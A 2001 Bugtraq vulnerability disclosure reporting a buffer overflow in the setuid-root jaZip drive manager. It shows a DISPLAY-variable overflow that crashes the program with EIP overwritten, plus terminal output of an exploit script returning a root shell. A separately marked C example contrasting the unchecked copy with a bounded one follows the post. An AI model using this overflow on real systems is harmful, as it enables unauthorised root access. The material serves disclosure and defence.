Date: Sun, 14 Jan 2001 17:05:48 +0000
From: teleh0r <teleh0r@DOGLOVER.COM>
Subject: Vulnerability in jaZip.
To: BUGTRAQ@SECURITYFOCUS.COM

Dear Bugtraq,

jaZip is a program for managing an Iomega Zip or Jaz drive. It is often
installed setuid root - and because of a buffer overflow it is possible
for regular users to become root. Please excuse me if this was known.

Please note that I cannot guarantee that this information is correct.

Tested rpm:
ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/RPMS/jaZip-0.32-2.i386.rpm

[root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
[root@localhost /root]# gdb /usr/X11R6/bin/jazip
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
(gdb) r
Starting program: /usr/X11R6/bin/jazip

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

----

[teleh0r@localhost teleh0r]$ rpm -q jaZip
jaZip-0.32-2
[teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
Address: 0xbffff7ac
bash#

Exploit attached.

Sincerely yours,
teleh0r

--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
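The defect class this post reports, an environment value copied into a fixed-size stack buffer, shown as an added C example that is not jaZip's code and not part of the post: the unchecked copy beside a bounded one that rejects over-long values instead of truncating them. The buffer sizes, the DISPLAY_MAX cap and the function names are assumptions.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical cap for a display name; the post does not give jaZip's
 * real buffer size. */
#define DISPLAY_MAX 256

/* The shape of the defect the post reports: a value taken from the
 * environment and copied into a fixed-size stack buffer with no length
 * check.  Kept only for contrast; nothing below calls it. */
int open_display_unchecked(const char *display)
{
    char buf[64];
    strcpy(buf, display);              /* writes past buf for long values */
    return (int)strlen(buf);
}

/* Hardened form: measure against the destination size and reject, rather
 * than silently truncate, anything that does not fit.  Returns 0 on
 * success, -1 if the value is missing, empty, or too long. */
int copy_display_checked(const char *display, char *out, size_t outlen)
{
    size_t n = 0;
    if (display == NULL || out == NULL || outlen == 0)
        return -1;
    while (n < outlen && display[n] != '\0')   /* never reads past outlen */
        n++;
    if (n == 0 || n == outlen)                 /* empty, or no room for NUL */
        return -1;
    memcpy(out, display, n + 1);
    return 0;
}

/* Test helper: a constructed value of `len` bytes of 'A', the same shape as
 * the 2100-byte DISPLAY that crashed jaZip in the post.  Returns 1 if the
 * value is accepted into a DISPLAY_MAX buffer, 0 if rejected. */
int accepts_display_of_length(size_t len)
{
    char out[DISPLAY_MAX], *val = malloc(len + 1);
    int ok;
    if (val == NULL)
        return 0;
    memset(val, 'A', len);
    val[len] = '\0';
    ok = copy_display_checked(val, out, sizeof out) == 0;
    free(val);
    return ok;
}
```

In a setuid binary the checked copy belongs before the value reaches any library call, and the same treatment applies to every other environment variable the program consumes.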